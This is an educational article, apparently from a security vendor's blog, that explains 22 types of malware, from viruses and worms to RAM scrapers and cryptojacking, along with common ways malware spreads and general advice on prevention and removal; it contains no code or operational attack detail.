Types of Malware

What is Malware?

Malware, or malicious software, is any program or file that harms a computer or its user. Common types of malwares include computer viruses,?ransomware, worms, trojan horses and?spyware. These malicious programs can steal, encrypt or delete?sensitive data, alter or hijack key computing functions and to monitor the victim's computer activity.?

Cybercriminals use a variety of physical and virtual means to infect devices and networks with malware. For example,?WannaCry, a famous?ransomware?attack?was able to spread by?exploiting?a known?vulnerability.?Phishing?is another common malware delivery method where emails disguised as legitimate messages contain malicious links or email?attachments that deliver executable malware to unsuspecting users.?

Sophisticated malware attacks use a?command-and-control server?to allow attackers to communicate with the infected computer system, steal sensitive information from the hard drive or gain remote access to the device.

Emerging strains of malware?cyber-attacks?include evasion and obfuscation techniques designed to fool users, security administrators and anti-malware products. Evasion techniques can be simple tactics to hide the source IP address and include polymorphic malware, which changes its code to avoid detection from signature-based detection tools. Another example is fileless malware that only exists in a system's RAM to avoid being detected.?

Different types of malwares have unique traits and characteristics, we'll cover 22 in this post.?

Types of Malwares

1. Computer Virus

A virus is a type of malware that, when executed, self-replicates by modifying other computer programs and inserting their own code. When this replication succeeds, the affected areas are then said to be infected.?

Virus writers use?social engineering?and exploit vulnerabilities to infect systems and spread the virus. The Microsoft Windows and?Mac operating systems are the targets of most viruses?that often use complex anti-detection strategies to evade antivirus?software. ?

Viruses are created to make profit (e.g.,?ransomware), send a message, personal amusement, demonstrate?vulnerabilities?exist, sabotage and?denial of?service, or to simply explore?cybersecurity?issues, artificial life and evolutionary algorithms.?

Computer viruses cause billions of dollars’ worth of economic damage by causing system failure, wasting resources, corrupting data, increasing maintenance costs, logging keystrokes, and stealing personal information (e.g., credit card numbers).

2. Computer Worm

A?computer worm?is a self-replicating malware program whose primary purpose is to infect other computers by duplicating itself while remaining active on infected systems.?

Often, worms use computer networks to spread, relying on?vulnerabilities?or security failures on the target computer to access it. Worms almost always cause at least some harm to a network, even if only by consuming bandwidth. This is different to viruses which almost always corrupt or modify files on the victim's computer. ?

WannaCry?is a famous example of a?ransomware?crypto worm that spread without user action by exploiting the Eternal Blue?vulnerability.?

While many worms are designed to only spread and not change systems they pass through, even payload-free worms can cause major disruptions. The Morris worm and My doom caused major disruptions by increasing network traffic despite their benign nature.

3. Trojan Horse

A trojan?horse or trojan is any malware that misleads users of its true intent by pretending to be a legitimate program. The term is derived from the Ancient Greek story of the deceptive Trojan?Horse that led to the fall of the city of Troy.

Trojans are generally spread with?social engineering?such as?phishing.?

For example, a user may be tricked into executing an email attachment disguised to appear genuine (e.g., an Excel spreadsheet). Once the executable file is opened, the trojan is installed.?

While the payload of a trojan can be anything, most act as a backdoor giving the attacker unauthorized access to the infected computer. Trojans can give access to personal information such as internet activity, banking login credentials, passwords or?personally identifiable information (PII).?Ransomware?attacks?are also carried out using trojans.?

Unlike computer viruses and worms, trojans do not generally attempt to inject malicious code into other files or propagate themselves.?

4. Rootkits

A rootkit is a collection of malwares designed to give unauthorized access to a computer or area of its software and often masks its existence or the existence of other software. ?

Rootkit installation can be automated, or the attacker can install it with administrator access.

Access can be obtained by a result of a direct attack on the system, such as exploiting?vulnerabilities, cracking passwords or?phishing.?

Rootkit detection is difficult because it can subvert the antivirus?program intended to find it. Detection methods include using trusted operating systems, behavioural methods, signature scanning, difference scanning and memory dump analysis.?

Rootkit removal can be complicated or practically impossible, especially when rootkits reside in the kernel. Firmware rootkits may require hardware replacement or specialized equipment.

5. Ransomware

Ransomware?is a form of malware, designed to deny access to a computer system or data until ransom is paid. Ransomware spreads through?phishing?emails, malvertising, visiting infected websites or by exploiting?vulnerabilities.

Ransomware?attacks cause downtime,?data leaks, intellectual property theft and?data breaches.

Ransom payment amounts range from a few hundred to hundreds of thousands of dollars. Payable in cryptocurrencies like Bitcoin.

6. Keylogger

Keyloggers, keystroke loggers or system monitoring are a type of malware used to monitor and record each keystroke typed on a specific computer's keyboard. Keyloggers are also available for?smartphones.

Keyloggers store gathered information and send it to the attacker who can then extract sensitive information like login credentials and credit card details.?

7. Grayware

The term grayware was coined in September 2004 and describes unwanted applications or files that aren't malware but worsen the performance of the computer and can cause?cybersecurity risk.?

At a minimum, grayware behaves in an annoying or undesirable manner and at worst, monitors the system and phones home with information.?

Grayware alludes to adware and spyware. The good news is most antivirus?software can detect potentially unwanted programs and offer to delete them.

Adware and spyware are generally easy to remove because they are not as nefarious as other types of malwares.?

The bigger concern is the mechanism the grayware used to gain access to the computer, be it?social engineering, unpatched software or other?vulnerabilities. Other forms of malware such as a?ransomware?can use the same method to gain access.?

Use the presence of adware to serve as a warning that the device or user has a weakness that should be corrected.

8. Fileless Malware

Fileless malware is a type of malware that uses legitimate programs to infect a computer. Unlike other malware infections, it does not rely on files and leaves no footprint, making it challenging for anti-malware?software to detect and remove. It exists exclusively as a computer memory-based artifact i.e., in RAM.

Fileless malware emerged in 2017 as a mainstream?cyber threat?but has been around for a while. Frodo, Number of the Beast and the Dark Avenger were all early fileless malware?attacks. More recently, the Democratic National Committee and the Equifax breach fell victim to fileless malware?attacks.?

Fileless malware does not write any part of its activity to the computer's hard drive making it resistant to existing anti-computer forensic strategies to incorporate file-based whitelisting, signature detection, hardware verification, pattern-analysis or timestamping.?

It leaves very little evidence that can be used by?digital forensics?investigators to identify illegitimate activity. That said, as it is designed to work in-memory, it generally only exists until the system is rebooted.

9. Adware

Adware is a type of grayware designed to put advertisements on your screen, often in a web browser or popup. ?

Typically, it distinguishes itself as legitimate or piggybacks on another program to trick you into installing it on your computer, tablet or smartphone.?

Adware is one of the most profitable, least harmful forms of malware and is becoming increasingly popular on mobile devices. Adware generates revenue by automatically displaying advertisement to the user of the software. ??

10. Malvertising

Malvertising, a portmanteau of malicious advertising, is the use of advertising to spread malware. It typically involves injecting malicious or malware-laden advertisements into legitimate advertising networks and webpages.?

Advertising is a great way to spread malware because significant effort is put into ads to make them attract to users to sell or advertise a product.?

Malvertising also benefits from the reputation of the sites it is placed on, such as high-profile and reputable news websites.?

11. Spyware

Spyware?is malware that gathers information about a person or organization, sometimes without their knowledge, and sends the information to the attacker without the victim's consent.?

Spyware usually aims to track and sell your internet usage data, capture your credit card or bank account information or steal?personally identifiable information (PII).

Some types of spyware can install additional software and change the settings on your device. Spyware is usually simple to remove because it is not as nefarious as other types of malwares. ?

12. Bots and Botnets

A bot is a computer that is infected with malware that allows it to be remotely controlled by an attacker.?

The bot (or zombie computer) can then be used to launch more cyber-attacks or become part of a botnet (a collection of bots).

Botnets are a popular method for distributed denial of service (DDoS) attacks, spreading ransomware, keylogging and spreading other types of malwares.?

13. Backdoor

A backdoor is a covert method of bypassing normal authentication or?encryption?in a computer, product, embedded device (e.g., router) or other part of a computer.?

Backdoors are commonly used to secure remote access to a computer or gain access to encrypted files.?

From there, it can be used to gain access to, corrupt, delete or transfer?sensitive data.

Backdoors can take the form a hidden part of a program (a trojan horse), a separate program or code in firmware and operating systems.?

Further, backdoors can be created or widely known. Many backdoors have legitimate use cases such as the manufacturer needing a way to reset user passwords.

14. Browser Hijacker

A browser hijacker or hijackware changes the behaviour of a web browser by sending the user to a new page, changing their home page, installing unwanted toolbars, displaying unwanted ads or directing users to a different website. ?

15. Crimeware

Crimeware is a class of malware designed to automate cybercrime.?

It is designed to perpetrate identity theft through?social engineering?or stealth to access the victim's financial and retail accounts to steal funds or make unauthorized transactions. Alternatively, it may steal confidential or sensitive information as part of?corporate espionage.?

16. Malicious Mobile Apps

Not all apps available through the App Store and Google Play are legitimate. That said, the App Store is generally safer due to better pre-screening of third-party apps.?

Malicious apps can steal user information, attempt to extort users, gain access to corporate networks, force users to view unwanted ads or install a backdoor on the device.

17. RAM Scraper

A RAM scraper is a type of malware that harvests the data temporarily stored in-memory or RAM. This type of malware often targets?point-of-sale (POS)?systems like cash registers because they can store unencrypted credit card numbers for a brief period of time before encrypting them then passing them to the back-end.

18. Rogue Security Software

Rogue security software tricks user into thinking their system has a security problem such as a virus and entices them to pay to have it removed. The fake security software is the malware that needs to be removed.?

19. Crypto jacking

Crypto jacking is a type of malware that uses a victim's computing power to mine cryptocurrency.?

20. Hybrid Malware

Today most malware is a combination of existing malware attacks, often trojan?horses, worms, viruses, and ransomware.?

For example, a malware program may appear to be a trojan but once executed it may act as a worm and try to attack over victims on the network.?

21. Social Engineering and Phishing

While?social engineering?and?phishing?aren't malware per say. They are popular delivery mechanisms for malware attacks. For example, a phisher may be trying to get a user to log into a phishing website but may also attach an infected attachment to the email to increase their chances of success.

22. Bugs

Like?social engineering?and phishing, bugs aren't malware, but they can open?vulnerabilities?for malware to exploit. A great example is the eternal blue vulnerability that was in Windows operating systems that led to the spread of the?WannaCry?ransomware?crypto worm.?

How Does Malware Spread?

There are six common ways that malware spreads:

1. Vulnerabilities:?A security defect in software allows malware to exploit it to gain unauthorized access to the computer, hardware or network
2. Backdoors:?An intended or unintended opening in software, hardware, networks, or system security
3. Drive-by downloads:?Unintended download of software with or without knowledge of the end user
4. Homogeneity:?If all systems are running the same operating system and connected to the same network, the risk of a successful worm spreading to other computers is increased
5. Privilege escalation:?A situation where an attacker gets escalated access to a computer or network and then uses it to mount an attack.
6. Blended threats:?Malware packages that combine characteristics from multiple types of malwares making them harder to detect and stop because they can exploit different?vulnerabilities.

How to Find and Remove Malware

The increasing sophistication of malware attacks means finding and removing them can be harder than ever.?

Many malware programs start out as a trojan?horse or worm and then add the victim's computer to a botnet, letting the attacker into the victim's computer and network.

If you're lucky, you can see the malware executables in your active processes but as we know the rise of fileless malware is making this more difficult.?

Unfortunately, finding and removing is becoming more difficult because you may never know the extent of the infection. Often, you're better off backing up any data and reimaging the computer.?

Prevention?is key. Keep your systems patched,?continuously monitor for vulnerabilities,?and educate your staff on the dangers of executing attachments and programs from suspicious emails. And remember,?third-party risk?and?fourth-party risk?exist.?

You need to make sure your?third-party risk management framework?and?vendor risk management?program forces your vendors to keep their systems secure and free of malware like you do. Customers don't care whether it was you or your vendors who caused a?data breach?or?data leak. Don't join our list of the?biggest data breaches.

Source: Abi Tyas Tunggal: www.upguard.com

?